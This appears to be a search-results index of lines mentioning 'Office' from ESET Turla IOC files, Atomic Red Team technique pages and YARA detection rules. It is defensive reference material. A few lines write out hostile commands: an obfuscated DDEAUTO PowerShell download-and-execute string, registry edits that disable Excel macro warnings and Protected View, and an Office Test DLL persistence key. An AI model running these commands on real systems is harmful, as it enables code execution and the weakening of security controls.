a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-crutch-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-lightneuron-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-outlook-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-powershell-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-powershell-event.json | "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-powershell-event.json | "https://github.com/itsreallynick/office-crackros" |
© ESET 2014-2018 |
| malware-ioc | misp-turla-wateringhole-armenia-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| atomic-red-team | Atomic_Friday.md | (index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" \| stats values(CommandLine) by Computer |
MIT License. © 2018 Red Canary |
| atomic-red-team | Office_Macro_COM.md | # Office Macro - COM | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1137 Office Application Startup CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1137.001 Office Template Macros CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1137.002 Office Test | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Office Apllication Startup Test Persistence [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #18: Disable Microsoft Office Security Features [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #5: Office launching .bat file from AppData [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-index.md | - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-index.md | - T1137 Office Application Startup CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-index.md | - T1137.001 Office Template Macros CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-index.md | - T1137.002 Office Test CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #18: Disable Microsoft Office Security Features [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1137 Office Application Startup CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1137.001 Office Template Macros CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1137.002 Office Test | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Office Apllication Startup Test Persistence [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #5: Office launching .bat file from AppData [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-matrix.md | | Compromise Software Dependencies and Development Tools CONTRIBUTE A TEST | Cron | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | At (Linux) | Binary Padding | Bash History | Cloud Account CONTRIBUTE A TEST | Internal Spearphishing CONTRIBUTE A TEST | Archive via Custom Method CONTRIBUTE A TEST | Exfiltration Over Alternative Protocol | Bidirectional Communication CONTRIBUTE A TEST | Application or System Exploitation CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-matrix.md | | | | Office Application Startup CONTRIBUTE A TEST | | Hijack Execution Flow CONTRIBUTE A TEST | Web Portal Capture CONTRIBUTE A TEST | User Activity Based Checks CONTRIBUTE A TEST | | Web Portal Capture CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-matrix.md | | | | Office Template Macros CONTRIBUTE A TEST | | Impair Command History Logging | | Virtualization/Sandbox Evasion CONTRIBUTE A TEST | | | | Port Knocking CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-matrix.md | | | | Office Test CONTRIBUTE A TEST | | Impair Defenses CONTRIBUTE A TEST | | | | | | Protocol Impersonation CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | Compromise Software Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | Accessibility Features | Asynchronous Procedure Call | Bash History | Cloud Account CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Library CONTRIBUTE A TEST | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Commonly Used Port CONTRIBUTE A TEST | Data Destruction | | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | Office Application Startup CONTRIBUTE A TEST | Port Monitors CONTRIBUTE A TEST | Impair Command History Logging | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | Office Template Macros CONTRIBUTE A TEST | Portable Executable Injection CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | Office Test | PowerShell Profile | Indicator Blocking | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | Office Application Startup CONTRIBUTE A TEST | Path Interception by Search Order Hijacking CONTRIBUTE A TEST | Hidden Window | Unsecured Credentials CONTRIBUTE A TEST | | | | | Web Protocols | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | Office Template Macros CONTRIBUTE A TEST | Path Interception by Unquoted Path | Hide Artifacts | Web Portal Capture CONTRIBUTE A TEST | | | | | Web Service CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | Office Test | Port Monitors CONTRIBUTE A TEST | Hijack Execution Flow CONTRIBUTE A TEST | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.003.md | Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</blockquote> | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.md | Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.md | ##### Description: The 64-bit version of Microsoft Office must be installed | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.005.md | Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript/JScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.005.md | A note regarding this module, due to the way that this module utilizes “ScriptControl” a 64bit version of Microsoft Office is required. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.005.md | ##### Description: The 64-bit version of Microsoft Office must be installed | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | svchost.exe writing a non-Microsoft Office file to a file with a UNC path. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1110.001.md | In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1110.003.md | In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | # T1137.002 - Office Test | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | <blockquote>Adversaries may abuse the Microsoft Office “Office Test” Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | There exist user and global Registry keys for the Office Test feature: | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</blockquote> | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | - Atomic Test #1 - Office Apllication Startup Test Persistence | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | ## Atomic Test #1 - Office Apllication Startup Test Persistence | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | reg add “HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf” /t REG_SZ /d “#{thing_to_execute}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1137.002.md | reg delete “HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | - Atomic Test #5 - Office launching .bat file from AppData | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | ## Atomic Test #5 - Office launching .bat file from AppData | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.md | | microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter.</blockquote> | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | 10. DDEAUTO “C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString(‘http:// |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | - Atomic Test #18 - Disable Microsoft Office Security Features | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | ## Atomic Test #18 - Disable Microsoft Office Security Features | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” -Name “VBAWarnings” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableInternetFilesInPV” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableUnsafeLocationsInPV” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableAttachementsInPV” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | Remove-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” -Name “VBAWarnings” -ErrorAction Ignore | Out-Null | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | Remove-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.md | within the office document itself. An example of this technique can be seen in sample | MIT License. © 2018 Red Canary |
| atomic-red-team | T1566.001.md | There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.</blockquote> | MIT License. © 2018 Red Canary |
| signature-base | apt_apt30_backspace.yar | $s19 = “2003 Microsoft Office system” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_apt30_backspace.yar | $s2 = “Microsoft Office Word Plugin Scan” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_apt30_backspace.yar | $s6 = “2003 Microsoft Office system” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_magichound.yar | description = “Detects malicious macro / powershell in Office document” | CC BY-NC 4.0 |
| signature-base | apt_muddywater.yar | $s3 = “*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 O” wide | CC BY-NC 4.0 |
| signature-base | apt_sednit_delphidownloader.yar | $ = “\Interface\Office\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_unit78020_malware.yar | $a4 = “\Office Start.lnk” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_volatile_cedar.yar | $s17 = “Office Outlook HTTP” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_winnti_burning_umbrella.yar | $s3 = “Microsoft Office Word” fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_cobaltgang.yar | $x9 = “lnkName=’office 365’; “ fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_ole_loadswf_cve_2018_4878.yar | mitigation0 = “Implement Protected View for Office documents” | CC BY-NC 4.0 |
| signature-base | crime_ole_loadswf_cve_2018_4878.yar | weaponization = “Embedded in Microsoft Office first payloads” | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | reference = “https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about” | CC BY-NC 4.0 |
| signature-base | exploit_cve_2018_16858.yar | description = “RCE in Libre Office with crafted ODT file (CVE-2018-16858)” | CC BY-NC 4.0 |
| signature-base | exploit_cve_2018_16858.yar | and $tag in (0..0100) // <office:doc | CC BY-NC 4.0 |
| signature-base | general_officemacros.yar | description = “Detects an Microsoft Office file that contains the AutoOpen Macro function” | CC BY-NC 4.0 |
| signature-base | general_officemacros.yar | description = “Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)” | CC BY-NC 4.0 |
| signature-base | general_officemacros.yar | $x2 = “0M8R4KGxGuE” ascii // Base64 encoded office header D0CF11E0A1B11AE1.. | CC BY-NC 4.0 |
| signature-base | generic_anomalies.yar | description = “Detects an Office document that was created with a pirated version of MS Office 2007” | CC BY-NC 4.0 |
| signature-base | generic_anomalies.yar | $fp2 = “Office Feature Updates Logon” wide | CC BY-NC 4.0 |
| signature-base | gen_dde_in_office_docs.yar | // YARA rules Office DDE | CC BY-NC 4.0 |
| signature-base | gen_dde_in_office_docs.yar | description = “Detects DDE in MS Office documents” | CC BY-NC 4.0 |
| signature-base | gen_dde_in_office_docs.yar | reference = “https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/” | CC BY-NC 4.0 |
| signature-base | gen_excel_xll_addin_suspicious.yar | reference2=”https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/” | CC BY-NC 4.0 |
| signature-base | gen_sign_anomalies.yar | description = “Detects a suspicious unsigned office software protection platform service binary” | CC BY-NC 4.0 |
| signature-base | gen_sign_anomalies.yar | /* FileDescription Microsoft Office Software Protection Platform Service */ | CC BY-NC 4.0 |
| signature-base | gen_susp_cmd_var_expansion.yar | description = “Detects Office droppers that include a variable expansion string” | CC BY-NC 4.0 |
| signature-base | gen_susp_office_dropper.yar | description = “Detects Office droppers that include a notice to enable active content” | CC BY-NC 4.0 |
| signature-base | gen_susp_office_dropper.yar | description = “Detects suspicious string that asks to enable active content in Office Doc” | CC BY-NC 4.0 |
| signature-base | gen_susp_office_dropper.yar | $a3 = “Microsoft Office Word” fullword ascii | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | // XML Office documents | CC BY-NC 4.0 |
MIT License. Copyright (c) 2020 Strontic.